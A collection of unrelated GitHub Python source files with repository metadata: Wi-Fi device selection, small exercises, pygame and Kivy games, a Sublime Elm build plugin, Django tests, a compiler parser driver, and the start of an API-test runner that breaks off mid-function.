len(nm.get_wifi_devices()) > 1 and dual_enabled():\n return MULTI_MODE\n else:\n return SINGLE_MODE\n\n\ndef get_ap_device() -> \"NetworkManager.Device\":\n global ap_device\n\n if not ap_device:\n devs = nm.get_wifi_devices()\n spec = get_conf().primary_wifi_device\n\n if spec:\n for dev in devs:\n if dev.Interface == spec:\n ap_device = dev\n\n if not ap_device:\n ap_device = devs[0]\n\n if ap_device:\n return ap_device\n else:\n raise\n\n\ndef get_link_device() -> \"NetworkManager.Device\":\n global link_device\n\n if not link_device:\n devs = nm.get_wifi_devices()\n link_device = get_ap_device()\n\n if dual_enabled():\n for dev in devs:\n if dev.Interface != link_device.Interface:\n link_device = dev\n return link_device\n\n return link_device\n\n\ndef get_state_device(state: str) -> \"NetworkManager.Device\":\n if state == \"HOTSPOT\":\n return get_ap_device()\n else:\n return get_link_device()\n","repo_name":"davesteele/comitup","sub_path":"comitup/modemgr.py","file_name":"modemgr.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"53"} +{"seq_id":"22606863496","text":"import unittest\nfrom answers import get_correct_answer\n\ndef is_prime(x):\n i = 2\n while i * i <= x:\n if x % i == 0:\n return False\n i += 1\n\n return True\n\ndef f(start, end):\n if start > end:\n return 0\n if start == end:\n return 1\n if start == 33:\n return 0\n else:\n x = start\n while x == start or not is_prime(x):\n x += 1\n return f(start + 2, end) + f(x, end)\n\ndef solve():\n return f(2, 14) * f(14, 45)\n\nclass Problem125(unittest.TestCase):\n def test(self):\n assert solve() == get_correct_answer(23, 125)\n\nif __name__ == '__main__':\n print(solve())","repo_name":"DmitryKochetkov/polyakov_py","sub_path":"solutions23/problem125.py","file_name":"problem125.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3285300973","text":"import pygame, sys, random\npygame.init()\nsize = (800, 500)\n# Crear ventana\nscreen = pygame.display.set_mode(size)\n#Reloj \nclock = pygame.time.Clock()\n#Colores\nBlack = ( 0, 0, 0 )\nWhite = ( 255, 255, 255 )\nRed = ( 255, 0, 0 )\nGreen = ( 0, 255, 0 )\nBlue = ( 0, 0, 255 )\nOrange = ( 250, 105, 5 )\ncor_list = []\nfor i in range(80):\n x = random.randint(0,800)\n y = random.randint(0,500)\n cor_list.append([x, y])\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n screen.fill(White)\n #Incio zona de dibujo\n for cord in cor_list:\n \n pygame.draw.circle(screen, Red, cord, 2)\n if cord[1]<=500:\n cord[1]+=1\n cord[0] += random.randint(-1,1)\n else:\n cord[0]=random.randint(0,800)\n cord[1]=0\n \n #Fin hora de dibujo\n #Pintar pantalla\n pygame.display.flip()\n clock.tick(30)","repo_name":"JosuePoz/PyGamePrueba","sub_path":"prueba5.py","file_name":"prueba5.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30645656855","text":"\nimport json\nimport os\nimport sublime\nimport sublime_plugin\nimport subprocess\nimport string\nimport threading\n\nUSER_SETTING_PREFIX = 'elm_language_support_'\nELM_SETTINGS_FILE = 'Elm Make this File.sublime-settings' \n\ndef get_popen_startupinfo():\n if os.name == 'nt':\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n startupinfo.wShowWindow = subprocess.SW_HIDE\n return startupinfo\n else:\n return None\n \nclass ElmMakeCommand(sublime_plugin.WindowCommand):\n\n encoding = 'utf-8'\n panel_lock = threading.Lock()\n killed = False\n proc = None\n\n def run(self, cmd=[], kill=False):\n if kill:\n if self.proc:\n self.killed = True\n self.proc.terminate()\n return\n\n working_dir = self.window.extract_variables()['file_path']\n self.create_panel(working_dir)\n\n if self.proc is not None:\n self.proc.terminate()\n self.proc = None\n\n self.proc = subprocess.Popen(\n self.format_cmd(cmd),\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=working_dir,\n startupinfo=get_popen_startupinfo()\n )\n self.killed = False\n\n threading.Thread(\n target=self.read_handle,\n args=(self.proc.stdout,)\n ).start()\n\n def format_cmd(self, cmd):\n binary, command, file, output = cmd[0:4]\n\n binary = binary.format(elm_binary=self.get_setting('elm_binary'))\n\n return [binary, command, file, output] + cmd[4:]\n\n def create_panel(self, working_dir):\n # Only allow one thread to touch output panel at a time\n with self.panel_lock:\n # implicitly clears previous contents\n self.panel = self.window.create_output_panel('exec')\n\n settings = self.panel.settings()\n\n self.panel.assign_syntax('Packages/Elm Make this File/Elm Compile Messages.sublime-syntax')\n settings.set('gutter', False)\n settings.set('scroll_past_end', False)\n settings.set('word_wrap', False) \n\n # Enable result navigation\n settings.set(\n 'result_file_regex',\n r'^\\-\\- \\w+: (?=.+ \\- (.+?):(\\d+)(?=:(\\d+))?)(.+) \\- .*$'\n )\n settings.set('result_base_dir', working_dir)\n\n preferences = sublime.load_settings('Preferences.sublime-settings')\n \n show_panel_on_build = preferences.get('show_panel_on_build', True)\n if show_panel_on_build:\n self.window.run_command('show_panel', {'panel': 'output.exec'})\n\n def read_handle(self, handle):\n chunk_size = 2 ** 13\n output = b''\n while True:\n try:\n chunk = os.read(handle.fileno(), chunk_size)\n output += chunk\n\n if chunk == b'':\n if output != b'':\n self.queue_write(self.format_output(output.decode(self.encoding)))\n raise IOError('EOF')\n\n except UnicodeDecodeError as e:\n msg = 'Error decoding output using %s - %s'\n self.queue_write(msg % (self.encoding, str(e)))\n break\n\n except IOError:\n if self.killed:\n msg = 'Cancelled'\n else:\n msg = 'Finished'\n sublime.set_timeout(lambda: self.finish(), 0)\n self.queue_write('[%s]' % msg)\n break\n\n def queue_write(self, text):\n # Calling set_timeout inside this function rather than inline ensures\n # that the value of text is captured for the lambda to use, and not\n # mutated before it can run.\n sublime.set_timeout(lambda: self.do_write(text), 1)\n\n def do_write(self, text):\n with self.panel_lock:\n self.panel.set_read_only(False)\n self.panel.run_command('append', {'characters': text})\n self.panel.set_read_only(True)\n sublime.set_timeout(lambda: self.panel.run_command(\"move_to\", {\"to\": \"bof\"}), 1)\n\n\n def format_output(self, output):\n try:\n data = json.loads(output)\n if data['type'] == 'compile-errors':\n return self.format_errors(data['errors'])\n elif data['type'] == 'error':\n return self.format_compiler_error(data)\n else:\n return 'Unrecognized compiler output:\\n' + str(output) + '\\n\\nPlease report this bug in Elm Language Support.\\n\\n'\n except ValueError as e:\n return ''\n\n def format_errors(self, errors):\n return '\\n'.join(map(self.format_error, errors)) + '\\n'\n\n def format_error(self, error):\n file = error['path']\n return '\\n'.join(map(lambda problem: self.format_problem(file, problem), error['problems']))\n\n def format_problem(self, file, problem):\n error_format = string.Template('-- $type: $title - $file:$line:$column\\n\\n$message\\n')\n\n type = 'error'\n title = problem['title']\n line = problem['region']['start']['line']\n column = problem['region']['start']['column']\n message = self.format_message(problem['message'])\n\n vars = locals()\n vars.pop('self') # https://bugs.python.org/issue23671\n return error_format.substitute(**vars)\n\n def format_compiler_error(self, error):\n error_format = string.Template('-- $type: $title - $file:1\\n\\n$message\\n')\n\n type = 'error'\n title = error['title']\n file = error['path']\n message = self.format_message(error['message'])\n\n vars = locals()\n vars.pop('self') # https://bugs.python.org/issue23671\n return error_format.substitute(**vars)\n\n def format_message(self, message):\n format = lambda msg: msg if isinstance(msg, str) else msg['string']\n\n return ''.join(map(format, message))\n\n def finish(self):\n errs = self.panel.find_all_results()\n if len(errs) == 0:\n sublime.status_message('Build finished')\n else:\n sublime.status_message('Build finished with %d errors' % len(errs))\n\n\n def get_setting(self, key, user_key=None):\n package_settings = sublime.load_settings(ELM_SETTINGS_FILE)\n user_settings = self.window.active_view().settings()\n\n return user_settings.get(user_key or (USER_SETTING_PREFIX + key), package_settings.get(key))\n","repo_name":"pdamoc/elm-make-this-file","sub_path":"elm_make.py","file_name":"elm_make.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39813475440","text":"from django.test import TestCase\nfrom django.db.models import Q\n\nfrom story.cms_services import (\n get_stories_qs,\n get_story_search_filter,\n)\nfrom story.models import Story\n\n\nclass StoryFilterTestCase(TestCase):\n def test_get_stories_qs(self):\n # Given: No additional setup required for this test\n\n # When: Calling get_stories_qs function\n stories_qs = get_stories_qs()\n\n # Then: We should get a queryset of all stories\n self.assertEqual(stories_qs.count(), Story.objects.count())\n\n def test_get_story_search_filter(self):\n # Given: A search type and search value\n search_type = 'title'\n search_value = 'example'\n\n # When: Calling get_story_search_filter function\n search_filter = get_story_search_filter(search_type, search_value)\n\n # Then: We should get a valid Q object for title search\n self.assertIsInstance(search_filter, Q)\n self.assertEqual(search_filter, Q(title__icontains=search_value))\n\n # Given: A search type and search value for author\n search_type = 'author'\n search_value = 'admin'\n\n # When: Calling get_story_search_filter function\n search_filter = get_story_search_filter(search_type, search_value)\n\n # Then: We should get a valid Q object for author search\n self.assertIsInstance(search_filter, Q)\n self.assertEqual(search_filter, Q(author__nickname__icontains=search_value))\n\n # Given: An unsupported search type\n search_type = 'unsupported'\n search_value = 'example'\n\n # When: Calling get_story_search_filter function\n search_filter = get_story_search_filter(search_type, search_value)\n\n # Then: We should get an empty Q object\n self.assertIsInstance(search_filter, Q)\n self.assertEqual(search_filter, Q())\n","repo_name":"cwadven/StoryBuilder","sub_path":"story/test/test_cms_services.py","file_name":"test_cms_services.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23633359535","text":"def max_val(t): \n \"\"\" t, tuple or list\n Each element of t is either an int, a tuple, or a list\n No tuple or list is empty\n Returns the maximum int in t or (recursively) in an element of t \"\"\" \n flatten_list = []\n maximum = 0\n for item in t:\n if isinstance(item, list) or isinstance(item, tuple):\n inner_maximum = max_val(item)\n if inner_maximum > maximum:\n maximum = inner_maximum\n continue\n else:\n continue\n else:\n if item > maximum:\n maximum = item\n continue\n else:\n continue\n return maximum","repo_name":"IanMezza/edx-6.00.1x","sub_path":"finalExam/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13438461182","text":"from flask import Blueprint, render_template\n\n\nindex_page = Blueprint(\n 'index',\n __name__,\n static_folder='static',\n template_folder='templates'\n)\n\n\n@index_page.route('/')\ndef index(pageTitle=None):\n from fsdemo.pagedata.index import IndexPageData\n indexData = IndexPageData()\n return render_template('index.html', pageData=indexData)\n\n\n@index_page.route('/about')\ndef about(pageTitle=None):\n from fsdemo.pagedata.about import AboutPageData\n aboutData = AboutPageData()\n return render_template('about.html', pageData=aboutData)\n","repo_name":"dyslab/flask-site-demo","sub_path":"fsdemo/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2175078787","text":"# -*- coding: utf-8 -*-\nimport analiseLexica as lxc\nimport analiseEscopo as esc\nimport csv\nimport alfabeto\n\n#Estados\nP = 50\nLDE = 51\nDE = 52\nDF = 53\nDT = 54\nT = 55\nDC = 56\nLI = 57\nLP = 58\nB = 59\nLDV = 60\nLS = 61\nDV = 62\nS = 63\nE = 64\nLV = 65\nL = 66\nR = 67\nY = 68\nF = 69\nLE = 70\nID = 71\nTRUE = 72\nFALSE = 73\nCHR = 74\nSTR = 75\nNUM = 76\nPLINHA = 77\nM = 78\nU = 79\nIDD = 80\nIDU = 81\nNB = 82\nMF = 83\nMC = 84\nNF = 85\nMT = 86\nME = 87\nMW = 88\n\n#Regras armazenadas na forma Left -> Right\n# RIGHT = [1,2,1,1,1,1,1,1,1,1,9,7,4,5,3,8,5,3,4,2,1,2,1,5,3,1,1,1,5,7,7,5,7,1,4,2,2,3,3,1,3,3,3,3,3,3,1,3,3,1,3,3,1,1,2,2,2,2,3,4,2,2,1,1,1,1,1,3,1,3,4,1,1,1,1,1,1,1]\n# LEFT = [P,LDE,LDE,DE,DE,T,T,T,T,T,DT,DT,DT,DC,DC,DF,LP,LP,B,LDV,LDV,LS,LS,DV,LI,LI,S,S,U,U,M,M,M,M,M,M,M,E,E,E,L,L,L,L,L,L,L,R,R,R,Y,Y,Y,F,F,F,F,F,F,F,F,F,F,F,F,F,F,LE,LE,LV,LV,LV,ID,TRUE,FALSE,CHR,STR,NUM]\nRIGHT = [1,\t\t2,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t9,\t\t8,\t\t4,\t\t5,\t\t3,\t\t10,\t\t5,\t\t3,\t\t4,\t\t2,\t\t1,\t\t2,\t\t1,\t\t5,\t\t3,\t\t1,\t\t1,\t\t1,\t\t6,\t\t9,\t\t9,\t\t7,\t\t8,\t\t2,\t\t4,\t\t2,\t\t2,\t\t3,\t\t3,\t\t1,\t\t3,\t\t3,\t\t3,\t\t3,\t\t3,\t\t3,\t\t1,\t\t3,\t\t3,\t\t1,\t\t3,\t\t3,\t\t1,\t\t1,\t\t2,\t\t2,\t\t2,\t\t2,\t\t3,\t\t5,\t\t2,\t\t2,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t3,\t\t1,\t\t3,\t\t4,\t\t1,\t\t1,\t\t1,\t\t1,\t\t1,\t\t\t1,\t\t\t1,\t\t1,\t\t1,\t\t0,\t\t0,\t\t0,\t\t0,\t\t0,\t\t0,\t\t0]\nLEFT = [P, LDE,\tLDE,\tDE,\t DE,\t T,\t T,\t T, T, \tT, \tDT, \tDT, \tDT, \tDC, \tDC, \tDF, \tLP, \tLP, \tB, \tLDV,\tLDV,\tLS, \tLS, \tDV, \tLI, \tLI, \tS, \tS, \tU, \tU, \tM,\t M, \tM, \tM, \tM, \tM, \tM, \tE, \tE, \tE, \tL, \tL, \tL, \tL,\t L, \tL, \tL, \tR, \tR,\t R, \tY, \tY, \tY, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF, \tF,\t LE, \tLE, \tLV,\t LV, \tLV,\t IDD,\tIDU,\tID, \tTRUE, \tFALSE, \tCHR, STR,\tNUM, NB, \tMF,\t MC,\t NF,\t MT, \tME,\t MW]\n\nTAB_ACTION_GOTO = list(csv.reader(open(\"TabelaActionGoTo.csv\",\"r\"),delimiter=\"\\t\"))\n\n#ordem dos tokens na tabela\nTOKEN_TAB_ACTION=[alfabeto.INTEGER,alfabeto.CHAR,alfabeto.BOOLEAN,alfabeto.STRING,alfabeto.TYPE,alfabeto.EQUALS,alfabeto.ARRAY,alfabeto.LEFT_SQUARE,alfabeto.RIGHT_SQUARE,alfabeto.OF,alfabeto.STRUCT,alfabeto.LEFT_BRACES,alfabeto.RIGHT_BRACES,alfabeto.SEMI_COLON,alfabeto.COLON,alfabeto.FUNCTION,alfabeto.LEFT_PARENTHESIS,alfabeto.RIGHT_PARENTHESIS,alfabeto.COMMA,alfabeto.VAR,alfabeto.IF,alfabeto.ELSE,alfabeto.WHILE,alfabeto.DO,alfabeto.BREAK,alfabeto.CONTINUE,alfabeto.AND,alfabeto.OR,alfabeto.LESS_THAN,alfabeto.GREATER_THAN,alfabeto.LESS_OR_EQUAL,alfabeto.GREATER_OR_EQUAL,alfabeto.EQUAL_EQUAL,alfabeto.NOT_EQUAL,alfabeto.PLUS,alfabeto.MINUS,alfabeto.TIMES,alfabeto.DIVIDE,alfabeto.PLUS_PLUS,alfabeto.MINUS_MINUS,alfabeto.NOT,alfabeto.DOT,alfabeto.ID,alfabeto.TRUE,alfabeto.FALSE,alfabeto.CHARACTER,alfabeto.STRINGVAL,alfabeto.NUMERAL,alfabeto.EOF,PLINHA,P,LDE,DE,T,DT,DC,DF,LP,B,LDV,LS,DV,LI,S,U,M,E,L,R,Y,F,LE,LV,IDD,IDU,ID,TRUE,FALSE,CHR,STR,NUM,NB,MF,MC,NF,MT,ME,MW]\n\n#contador token do código\nproximo=-1\n\ndef tokenTAB(a):\n \"\"\"Retorna a coluna na tabela ACTION\"\"\"\n return TOKEN_TAB_ACTION.index(a)+1\n\ndef nextTokenOld():\n \"\"\"Retorna token da pilha TOKENS do analisador léxico\"\"\"\n global proximo\n proximo+=1\n try:\n return lxc.tokens_stack[proximo]\n except:\n return alfabeto.EOF\n\ndef nextToken():\n global proximo\n proximo+=1\n return lxc.nextToken()\n\nErro = False\n\ndef parse(arq):\n lxc.openArq(arq)\n \"\"\"Analisador Sintático\"\"\"\n global Erro\n PILHA = [] #armazena os estados\n state = 0 #linha da tabela ACTION\n PILHA.append(state)\n tokenLido = nextToken()\n action = TAB_ACTION_GOTO[state+1][tokenTAB(tokenLido)]\n \n cont=0\n while (action!=\"acc\"):\n # print(\"TESTE DO TOKENLIDO no passo \"+str(cont))\n # lxc.printSingleToken(tokenLido)\n # print('Token secundario: ', lxc.tokenSecundario)\n # print(tokenLido)\n # print(\"TESTE DA TABELA\")\n # print(action)\n # print(\"TESTE DA PILHA\")\n # print(PILHA)\n if (action[0]==\"s\"):\n \"\"\"shift to state\"\"\"\n state=int(action[1:])\n PILHA.append(state)\n tokenLido=nextToken()\n action = TAB_ACTION_GOTO[state+1][tokenTAB(tokenLido)]\n cont+=1\n elif (action[0]==\"r\"):\n \"\"\"reduce rule\"\"\"\n rule=int(action[1:])\n for x in range(RIGHT[rule-1]):\n PILHA.pop()\n try:\n state=int(TAB_ACTION_GOTO[PILHA[-1]+1][tokenTAB(LEFT[rule-1])])\n except:\n print(\"Erro de sintaxe na linha \"+str(lxc.LINHAS[proximo]))\n Erro = True\n break\n PILHA.append(state)\n action=TAB_ACTION_GOTO[state+1][tokenTAB(tokenLido)]\n cont+=1\n esc.Semantics(rule, tokenLido)\n else:\n \"\"\"erro de sintaxe\"\"\"\n Erro = True\n # print('proximo eh ', proximo)\n print(\"Erro de sintaxe na linha \"+str(lxc.LINHAS[proximo]))\n break\n if (not Erro):\n print(\"Sem erro de sintaxe.\")\n \n\n","repo_name":"lucasg1/SSLCompiler","sub_path":"analiseSintatica.py","file_name":"analiseSintatica.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19798315203","text":"# Time Complexity: O(n)\n# Memory Complexity: O(1)\n\nfrom typing import Optional\n\nfrom utilities.ListNode import ListNode\n\n\nclass Solution:\n def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\n def get_size(node):\n counter = 0\n while node:\n node = node.next\n counter += 1\n return counter\n\n def get_nth(node, n):\n counter = 1\n while counter < n:\n node = node.next\n counter += 1\n return node\n\n size = get_size(head)\n return get_nth(head, size // 2 + 1)\n\n\n# arr = [1, 2, 3, 4, 5, 6]\n# lst = ListNode().arr2list(arr)\n# print(lst)\n# print(Solution().middleNode(lst))\n","repo_name":"Jakub-Domogala/LeetCode","sub_path":"1.easy/0876. Middle of the Linked List.py","file_name":"0876. Middle of the Linked List.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30556448385","text":"import torch\nfrom torch.nn.parameter import Parameter\nimport torch.nn as nn\n\nclass SRMLayer(nn.Module):\n def __init__(self, channel):\n super(SRMLayer, self).__init__()\n self.bn = nn.BatchNorm2d(channel)\n self.activation = nn.Sigmoid()\n\n def _style_pooling(self, x, eps=1e-5):\n N, C, _, _ = x.size()\n\n channel_mean = x.view(N, C, -1).mean(dim=2, keepdim=True)\n channel_var = x.view(N, C, -1).var(dim=2, keepdim=True) + eps\n channel_std = channel_var.sqrt()\n t = torch.cat((channel_mean, channel_std), dim=2)\n return t\n \n def _style_integration(self, t):\n\n z = torch.sum(z, dim=2)[:, :, None, None] # B x C x 1 x 1\n z_hat = self.bn(z)\n g = self.activation(z_hat)\n return g\n\n def forward(self, x):\n t = self._style_pooling(x)\n g = self._style_integration(t)\n return x * g\n\nif __name__ == '__main__':\n import os\n import torch\n import argparse\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n ## 先把图片放到cuda上,再把模型放到cuda上\n parser = argparse.ArgumentParser()\n\n args = parser.parse_args()\n args.backbone = '50'\n args.lane_classes = 11\n args.road_classes = 3\n args.scenes_classes = 4\n args.use_psa = True\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n ## 先把图片放到cuda上,再把模型放到cuda上\n # b, c, h, w\n img = torch.rand(1, 128, 12, 20).cuda()\n output_scenes = SRMLayer(img)","repo_name":"033186ZSY/RLSNet-master","sub_path":"11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37048109712","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\nfrom random import randint\nfrom randomai import Ai\n# from rulebasedai import Ai\n# from minimaxai import Ai\n\nWINNING_LINES = (\n ((0,0),(0,1),(0,2)),((1,0),(1,1),(1,2)),((2,0),(2,1),(2,2)),\n ((0,0),(1,0),(2,0)),((0,1),(1,1),(2,1)),((0,2),(1,2),(2,2)),\n ((0,0),(1,1),(2,2)),((0,2),(1,1),(2,0))\n)\n\nSYMBOLS = ('X', 'O')\n\ndef symbol_generator():\n while True:\n for symbol in SYMBOLS:\n yield symbol\n\n\nclass Board(GridLayout):\n\n grid = None\n symbols = None\n\n def __init__(self, cols=3, **kwargs):\n super(Board, self).__init__(**kwargs)\n\n self.cols = cols\n self.rows = cols\n self.symbols = symbol_generator()\n\n self.grid = [[None for col in range(self.cols)] for row in range(self.rows)]\n\n self.draw_tiles()\n self.init_players()\n\n def init_players(self):\n # Who is the first?\n self.bot = Ai(SYMBOLS[randint(0,1)], self.grid)\n\n if self.bot.symbol == 'X':\n (r,c) = self.bot.play_move(self.grid)\n self.grid[r][c].text = next(self.symbols)\n self.grid[r][c].font_size = 100\n\n def draw_tiles(self):\n for row in range(self.rows):\n for col in range(self.cols):\n tile = Button()\n tile.bind(on_release=self.on_click)\n self.grid[row][col] = tile\n self.add_widget(tile)\n\n def on_click(self, instance):\n # if it is already taken\n if instance.text:\n return None\n\n #if it is an empty(available) cell\n instance.text = next(self.symbols)\n #instance.text = self.symbols.next()\n instance.font_size = 100\n if not self.is_finished():\n # HUMAN이 둔 후, 게임이 끝나지 않았으면 AI가 수를 둔다\n (r, c) = self.bot.play_move(self.grid)\n self.grid[r][c].text = next(self.symbols)\n self.grid[r][c].font_size = 100\n self.is_finished()\n\n def is_finished(self):\n winner = self.check_winner()\n\n if winner:\n content = BoxLayout(orientation='vertical')\n if winner == 'D' :\n content.add_widget(Label(text='Draw'))\n else:\n content.add_widget(Label(text='%s won the game!' % winner))\n restart_button = Button(text='Game restart!!')\n content.add_widget(restart_button)\n\n popup = Popup(title='Game Ends', content=content, auto_dismiss=False, size_hint=(.5,.5))\n popup.open()\n\n restart_button.bind(on_press=lambda *args: self.restart_board(popup, *args))\n return True\n else:\n return False\n\n def check_winner(self):\n for line in WINNING_LINES:\n row = []\n for cell in line:\n row.append(self.grid[cell[0]][cell[1]].text)\n\n for symbol in SYMBOLS:\n if all([s==symbol for s in row]):\n return symbol \n #game is on going\n for row in self.grid:\n for col in row:\n if col.text == '':\n return None\n # Draw\n return 'D'\n\n def restart_board(self, *args):\n # print(\"args\", args)\n args[0].dismiss()\n \n #clear board\n for row in self.grid:\n for col in row:\n col.text = ''\n\n #initialize symbol\n if next(self.symbols) =='O':\n return\n else:\n next(self.symbols)\n return\n\n self.init_players()\n\nclass TicTacToe(App):\n def build(self):\n self.board = Board()\n return self.board\n\nif __name__ == '__main__':\n TicTacToe().run() \n","repo_name":"goodlucky-Joy/Python_TicTacToe","sub_path":"03_TicTacToe/03_TicTacToe_1player_Ai.py","file_name":"03_TicTacToe_1player_Ai.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25323405835","text":"def season(month):\n if 3 <= month <= 5:\n print(\"\\nSpring\")\n elif 5 < month <= 8:\n print(\"\\nSummer\")\n elif 8 < month <= 11:\n print(\"\\nAutumn\")\n elif month == 12 or month == 1 or month == 2:\n print(\"\\nWinter\")\n else:\n print(\"\\nError\")\n\n\nnum_of_month = int(input(\"Input number of month - \"))\nseason(num_of_month)\n","repo_name":"NarekManukyan/examples1","sub_path":"season.py","file_name":"season.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26975044212","text":"import shutil\nfrom threading import Thread\nfrom threading import Lock\nimport unittest\nfrom optparse import OptionParser\nimport ddt\nimport requests\nfrom requests.packages import urllib3\nimport json\nfrom json import JSONDecodeError\nimport apirun\n\nfrom .genReport import html_report\nfrom .getToken import get_token\nfrom .extractExcel import HandleExcel\nfrom .mail import *\nfrom .PressureTest import *\nfrom .PtSlave import ConnectSlave\n\n\nurllib3.disable_warnings()\nlogger = logging.getLogger(__name__)\nversion = apirun.__version__\nreport_dir = ''\nheaders = {\"Content-Type\": \"application/json\"}\n_success = 0\n_failure = 0\n_error = 0\n_count_lock = Lock()\n\n\ndef add_success(num_s):\n global _success\n _count_lock.acquire()\n _success += num_s\n _count_lock.release()\n\n\ndef add_failure(num_f):\n global _failure\n _count_lock.acquire()\n _failure += num_f\n _count_lock.release()\n\n\ndef add_error(num_e):\n global _error\n _count_lock.acquire()\n _error += num_e\n _count_lock.release()\n\n\ndef parse_options():\n \"\"\"\n Handle command-line options with optparse.OptionParser.\n\n Return list of arguments, largely for use in `parse_arguments`.\n \"\"\"\n\n # Initialize\n parser = OptionParser(usage=\"apirun [options] [ApiRunClass [ApiRunClass2 ... ]]\")\n\n parser.add_option(\n '-f', '--testcasefile',\n dest='testcasefile',\n help=\"Testcase to run, e.g. '../testcase.xls'.\"\n )\n\n parser.add_option(\n '-F', '--testcasefolder',\n dest='testcasefolder',\n help=\"all testcase in the foler to run.\",\n default=\"\"\n )\n\n parser.add_option(\n '--report',\n action='store',\n type='str',\n dest='report',\n default='report',\n help=\"Store the reports.\",\n )\n\n # Version number (optparse gives you --version but we have to do it\n # ourselves to get -V too. sigh)\n parser.add_option(\n '-V', '--version',\n action='store_true',\n dest='show_version',\n default=False,\n help=\"show program's version number and exit\"\n )\n\n parser.add_option(\n '--demo',\n action='store_true',\n dest='make_demo',\n default=False,\n help=\"make demo xls in working folder\"\n )\n\n parser.add_option(\n '--email',\n action='store_true',\n dest='email',\n default=False,\n help='sending email after finishing api test'\n )\n\n parser.add_option(\n '--from',\n action='store_true',\n dest='email_from',\n default=False,\n help='the user who sends email'\n )\n\n parser.add_option(\n '--to',\n action='store_true',\n dest='email_to',\n default=False,\n help='the user(s) who receive email'\n )\n\n parser.add_option(\n '--subject',\n action='store_true',\n dest='email_subject',\n default=False,\n help='the email subject'\n )\n\n parser.add_option(\n '--host',\n action='store_true',\n dest='email_host',\n default=False,\n help='the email host'\n )\n\n parser.add_option(\n '--pt', '--pressuretest',\n dest='PtFile',\n help='run pressure test according to the xls, supported by locustio'\n )\n\n parser.add_option(\n '--pt-demo',\n action='store_true',\n dest='PtDemo',\n default=False,\n help='make PT demo file in current folder'\n )\n\n parser.add_option(\n '--pt-not-run',\n dest='PtNotRun',\n help='just make locustfile according to the xls'\n )\n\n parser.add_option(\n '--master',\n action='store_true',\n default=False,\n dest='master',\n help='Set locust to run in distributed mode with this process as master, use this parameter with --pt'\n )\n\n # Finalize\n # Return three-tuple of parser + the output from parse_args (opt obj, args)\n opts, args = parser.parse_args()\n return parser, opts, args\n\n\ndef run_test(title, filename, report_path, description, testcase):\n test = unittest.TestLoader().loadTestsFromTestCase(testcase)\n suit = unittest.TestSuite([test])\n runner, fp = html_report(title=title, filename=filename, report_path=report_path, description=description)\n results = runner.run(suit)\n fp.close()\n e = results.error_count\n f = results.failure_count\n s = results.success_count\n add_success(s)\n add_failure(f)\n add_error(e)\n\n\ndef get_apirun_path():\n if 'win' in sys.platform:\n python3_path = os.getenv('PYTHON')\n if not python3_path:\n python3_path = os.getenv('PYTHON3')\n if python3_path:\n if 'python3' in python3_path.lower():\n if 'scripts' in python3_path.lower():\n apirun_path = os.path.join(os.path.dirname(os.path.dirname(python3_path)), 'Lib\\\\site-packages\\\\apirun\\\\')\n else:\n apirun_path = os.path.join(python3_path, 'Lib\\\\site-packages\\\\apirun\\\\')\n else:\n sys_path = os.getenv('path').split(';')\n for each in sys_path:\n if 'python3' in each.lower() and 'scripts' not in each.lower():\n python3_path = each\n break\n apirun_path = os.path.join(python3_path, 'Lib\\\\site-packages\\\\apirun\\\\')\n elif 'linux' in sys.platform:\n with os.popen('find /usr/local/ -name apirun -type d') as lp:\n apirun_path = lp.read().strip()\n return apirun_path\n\n\ndef str_to_json(data):\n data = str(data).replace('\\'', '\"')\n j = json.loads(data, encoding='utf-8')\n return j\n\n\ndef start_test(testcasefile):\n testcase_data = HandleExcel(testcasefile)\n\n token_url, token_body, token_para, token_locate = testcase_data.auth_info()\n token_body = str_to_json(token_body)\n try:\n token = get_token(token_url, token_body, token_locate)\n except KeyError:\n logger.error('Please check your auth info, cannot get correct response.')\n sys.exit(1)\n except Exception as e:\n logger.error('{}'.format(e))\n sys.exit(1)\n global headers\n headers[token_para] = token\n\n testcase_list = 